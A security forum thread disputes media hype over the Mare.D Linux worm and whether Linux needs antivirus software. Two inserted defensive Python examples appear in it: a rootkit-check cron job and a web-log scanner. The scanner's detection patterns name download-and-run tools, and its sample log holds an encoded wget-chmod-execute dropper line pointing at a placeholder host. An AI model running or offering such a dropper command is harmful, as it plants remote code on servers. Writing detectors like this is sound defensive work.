
Thread: Ignore the Linux worm hype, say security vendors

  1. #1
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177

    Ignore the Linux worm hype, say security vendors

    Media reports circulating about the threat posed by a Linux worm called Mare.D have been written off as little more than the result of a "slow news week" by one leading antivirus expert.

    The stories stemmed from a fairly innocuous warning on F-Secure's blog about the virus which is targeting open source vulnerabilities, known about since last year, and the risk of infection is believed to be negligible.
    A worm that tries to find exploits over a year old??????? This is on an OS where you only need to reboot for Kernel patches..... Looking at the Slackware.com security patches, for 10.0 10.1 and 10.2 there hasn't even BEEN a Kernel patch.

    As such other security companies have told Silicon.com they are baffled by the media coverage the worm has attracted.

    But even F-Secure is confused as to how a run-of-the-mill blog posting has turned into a news story.

    Richard Hales, country manager at F-Secure, told Silicon.com: "I don't know why anybody has picked up on this anymore than they normally would. Our blog is there for commenting on everything from whether the chips were cold at a conference to reporting the latest variant of a worm. But if it's something serious we'd put out a warning and we'd issue a press release.

    "Perhaps because this had 'Linux' in the title it attracted a bit more interest."

    He said: "It does seem very odd to me to highlight a vector that is a year old and is very likely patched in production systems."

    Russ Cooper, senior information security analyst at CyberTrust, went further, suggesting the media is simply trying to "work up a lather among communities which don't normally buy antivirus software". He was referring to the fact a Linux worm might be seen as more newsworthy even if "there are no reports in the wild".

    Cooper added: "It must be a slow news week."

    Graham Cluley, senior technology consultant at Sophos, agreed. He confirmed his company had seen no reports of the virus and suggested novelty factor, rather than genuine threat may be behind the story.

    Cluley told Silicon.com: "At the moment, malware for all kinds of non-Microsoft platforms are making the news because of their novelty value I think. It's important that people who don't use Microsoft Windows realise that attacks do happen on other OSes but it's also important to keep these things in perspective."

    He added: "The problem is huge on Windows with 120,000-plus pieces of malware; that figure is humongous compared to Macintosh, Unix and so on."
    http://www.zdnetindia.com/news/secur...es/134140.html

  2. #2
    Senior Member
    Join Date
    Feb 2002
    Posts
    855
    Does Linux really need anti-virus software? What are you opinions?

    Here's something you might want to read and comment on:

    http://linuxmafia.com/~rick/faq/index.php?page=virus
    For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus our Lord.
    (Romans 6:23, WEB)

  3. #3
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    Originally posted here by preacherman481
    Does Linux really need anti-virus software? What are you opinions?
    I don't think a Linux system needs an anti-virus to protect _itself_ from viruses, but rather to stop any Windows viruses it might have downloaded on it or in an email attachment from spreading and infecting other users. You are very unlikely to be infected by a Linux virus, and even if you are the chances are that not much damage will be caused (unless you're dumb enough to use root as your daily account).

    Anti-viruses are used more on Linux servers/routers than desktops for this reason - because any Windows computers which might use it as a gateway or access it for other reasons could catch a virus that the server has. That's why, even though ClamAV has thousands of virus signatures, only an insignificant number of those are Linux ones.

    Cheers,

    -jk

    Ps. Thanks for the notice gore - I hadn't even heard all the news about it

  4. #4
    Originally posted here by preacherman481
    Does Linux really need anti-virus software? What are you opinions?

    Here's something you might want to read and comment on:

    http://linuxmafia.com/~rick/faq/index.php?page=virus
    If you simply never run untrusted executables while logged in as the root user (or equivalent), all the "virus checkers" in the world will be at best superfluous; at worst, downright harmful. "Hostile" executables (including viruses) are almost unfindable in the Linux world — and no real threat to it — because they lack root-user authority, and because Linux admins are seldom stupid enough to run untrusted executables as root, and because Linux users' sources for privileged executables enjoy paranoid-grade scrutiny (such that any unauthorised changes would be detected and remedied).
    There's only one problem with that idea -- as Mac users are discovering[1], any OS is capable of having malware, and a bit of malware running as a user is still capable of destroying everything that user cares about. Who cares if the underlying OS is chugging away happily, if you can't log in as you and all your files are corrupted/destroyed/whatever?


    [1] http://isc.sans.org/diary.php?storyid=1138 is a good intro.

  5. #5
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    On Linux and BSD, I don't use Anti Virus for anything but mail scanning..

    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any malware gets in..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !
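The cron routine the post above describes (run chkrootkit and rkhunter every day, get mail only when something turns up) as an added example; this is not the poster's script and is not part of the thread. It assumes the real flags `rkhunter --cronjob --report-warnings-only` and `chkrootkit -q`, a working local `mail` command, and the constructed tool output embedded below. The warning markers it greps for are an assumption about each tool's current wording.

```python
"""Daily rootkit sweep that mails root only when something is found.

Added example, not the poster's own cron job. It assumes the real tool
flags `rkhunter --cronjob --report-warnings-only` and `chkrootkit -q`, a
working local `mail` command, and the constructed tool output below that
is fed to the parser. The warning markers are an assumption about each
tool's current wording; re-check them after upgrading either tool.
"""
import socket
import subprocess
import sys

RKHUNTER_MARKERS = ('Warning',)
# Case matters: chkrootkit's normal output reads "... not infected".
CHKROOTKIT_MARKERS = ('INFECTED', 'Possible', 'You have', 'Warning')


def findings(output, markers):
    """Keep only the output lines carrying one of the warning markers."""
    return [line.strip() for line in output.splitlines()
            if any(marker in line for marker in markers)]


def run(cmd):
    """Run a checker and return its combined stdout and stderr.

    A tool that is missing, hangs or crashes is reported as a warning line
    rather than silently producing an empty (and therefore "clean") result.
    """
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        return f'Warning: could not run {cmd[0]}: {exc}'
    return proc.stdout + proc.stderr


def build_report(rkhunter_output, chkrootkit_output):
    """Combine both tools' findings; an empty list means nothing to mail."""
    report = []
    for name, lines in (('rkhunter', findings(rkhunter_output, RKHUNTER_MARKERS)),
                        ('chkrootkit', findings(chkrootkit_output, CHKROOTKIT_MARKERS))):
        if lines:
            report.append(f'{name}:')
            report.extend('  ' + line for line in lines)
    return report


def mail(subject, body, recipient='root'):
    subprocess.run(['mail', '-s', subject, recipient], input=body, text=True, check=False)


def main():
    report = build_report(
        run(['rkhunter', '--cronjob', '--report-warnings-only']),
        run(['chkrootkit', '-q']),
    )
    if not report:
        return 0          # quiet day: no mail, so any mail means "go and look"
    host = socket.gethostname()
    mail(f'[{host}] rootkit check: {len(report)} line(s)', '\n'.join(report))
    return 1


# Constructed sample output in the shape each tool prints; not real results.
SAMPLE_RKHUNTER = """\
Warning: The command '/bin/ls' has been replaced by a script: /bin/ls: POSIX shell script text executable
Warning: Hidden directory found: /dev/.udev
"""
SAMPLE_CHKROOTKIT = """\
Checking `lkm'... not infected
Checking `bindshell'... INFECTED (PORTS:  465)
"""

if __name__ == '__main__':
    sys.exit(main())
```

Install it from root's crontab (for instance `0 4 * * * /usr/local/sbin/rootkit-check.py`, path assumed) and it stays silent until a line matches, which is what keeps the mail from being ignored. Two caveats a practitioner will hit: both tools produce false positives (chkrootkit's bindshell test flags any listener on ports it associates with backdoors, so a mail server on 465 trips it, and rkhunter needs its known-good exceptions recorded in rkhunter.conf), and a kernel-level rootkit like the LKM mentioned later in this thread can lie to userland checkers, so a suspicious result should be confirmed from a boot medium you trust, not from the running host.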

  6. #6
    Senior Member
    Join Date
    Feb 2002
    Posts
    855
    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any malware gets in..
    Hi,
    Have you ever had any get in, and if so, what was it?
    For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus our Lord.
    (Romans 6:23, WEB)

  7. #7
    Originally posted here by the_JinX
    On Linux and BSD, I don't use Anti Virus for anything but mail scanning..

    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any malware gets in..

    Yeah it's good to be prepared just in case.

  8. #8
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Originally posted here by preacherman481
    Hi,
    Have you ever had any get in, and if so, what was it?
    My old webserver was once infected by some massmailer..
    It also hooked up an LKM rootkit (can't remember the name)..
    Because of the firewall (a separate machine) the attacker couldn't attach to the rootkit..

    We did clean out the entire box.. and did a reinstall..

    But haven't had anything in the last two years..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  9. #9
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401

    Re: Ignore the Linux worm hype, say security vendors

    Originally posted here by gore
    A worm that tries to find exploits over a year old??????? This is on an OS where you only need to reboot for Kernel patches..... Looking at the Slackware.com security patches, for 10.0 10.1 and 10.2 there hasn't even BEEN a Kernel patch.
    Mare.D doesn't exploit any kernel bugs.. It exploits vulnerable scripts in Mambo CMS and XML-RPC (PHP).. The only reason it's called a Linux worm is because of a compiled C program that gets dropped.. The executable was compiled specifically for Linux..
    Oliver's Law:
    Experience is something you don't get until just after you need it.
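Since the post above puts the worm at the web-application layer (Mambo and XML-RPC-for-PHP scripts, then a dropped Linux binary) rather than in the kernel, the place to look on a suspect box is the web server's access log, not the kernel version. The following scanner is an added example, not code from the thread or from any vendor quoted in it: it assumes Apache/nginx "combined" log lines and a constructed sample; the path and payload patterns are assumptions about what a fetch-and-run dropper looks like, not a signature for the worm itself.

```python
"""Scan web access-log lines for script-level exploitation attempts.

Added example, not code from the thread or from any vendor quoted in it.
It assumes Apache/nginx "combined" log lines and the constructed sample
below; the path and payload patterns are assumptions about what a
fetch-and-run dropper looks like, not a signature for any named worm.
"""
import re
from urllib.parse import unquote

# "combined" log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP entry points the thread names as the worm's targets (Mambo, XML-RPC).
TARGET_PATHS = re.compile(r'xmlrpc\.php|/mambo/|index\.php', re.I)

# Download-then-execute fragments in a query string. Assumed dropper style:
# fetch a binary, make it executable, run it.
DROPPER_RE = re.compile(
    r'\b(wget|curl|fetch)\s+\S+|\bchmod\s+\+?x\b|\./\S+;|\bperl\s+-e\b|\bsh\s+-c\b',
    re.I,
)


def parse_line(line):
    """Split one log line into fields; returns None for lines that don't parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    # Decode twice: attackers double-encode to slip past naive filters.
    entry['decoded'] = unquote(unquote(entry['path']))
    return entry


def classify(entry):
    """Return the list of reasons a request looks suspicious (may be empty)."""
    reasons = []
    path = entry['decoded']
    if TARGET_PATHS.search(path):
        reasons.append('target-script')
    if DROPPER_RE.search(path):
        reasons.append('dropper-payload')
    # The XML-RPC payload travels in the POST body, which access logs do not
    # record, so a POST to xmlrpc.php is the most the log itself can show.
    if entry['method'] == 'POST' and 'xmlrpc.php' in path.lower():
        reasons.append('xmlrpc-post')
    return reasons


def scan(lines):
    """Return (ip, decoded path, reasons) for requests worth a closer look.

    A request to index.php alone is normal traffic, so a hit needs either a
    dropper-looking payload or a POST to the XML-RPC endpoint.
    """
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if 'dropper-payload' in reasons or 'xmlrpc-post' in reasons:
            hits.append((entry['ip'], entry['decoded'], reasons))
    return hits


# Constructed sample log; addresses are from private/documentation ranges.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Feb/2006:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5123
10.0.0.9 - - [10/Feb/2006:03:14:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412
10.0.0.9 - - [10/Feb/2006:03:14:11 +0000] "GET /mambo/index.php?option=%63%64%20%2Ftmp%3B%77get%20http%3A%2F%2F192.0.2.5%2Fx%3Bchmod%20%2Bx%20x%3B.%2Fx%3B HTTP/1.1" 200 88
10.0.0.11 - - [10/Feb/2006:03:15:00 +0000] "GET /favicon.ico HTTP/1.1" 404 209
"""

if __name__ == '__main__':
    for ip, path, why in scan(SAMPLE_LOG.splitlines()):
        print(f'{ip}\t{",".join(why)}\t{path}')
```

Run it over a real log with `scan(open('/var/log/apache2/access.log').read().splitlines())` (path assumed). Two things the thread's own reasoning implies and the code makes concrete: patching the web application matters more than the kernel here, and a POST to xmlrpc.php with a 200 response is only a lead, because the injected XML-RPC body never reaches the access log; confirming exploitation means checking the PHP error log, /tmp and similar writable directories for a fresh executable, and the process list.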

  10. #10
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Re-read what that says. I was pointing out that Slackware Linux has had no Kernel updates in a long time, therefore no patches have required a reboot on Slackware, and this sploit was fixed over a year ago so there was no reason to not install the patch on a production machine as you wouldn't need to reboot it.

    I wasn't saying the thing had anything to do with the Kernel, merely pointing out, for our BSOD-loving members, that on some OSs reboots are only for hardware and Kernel code, and that is maybe the reason why no one saw it at all.
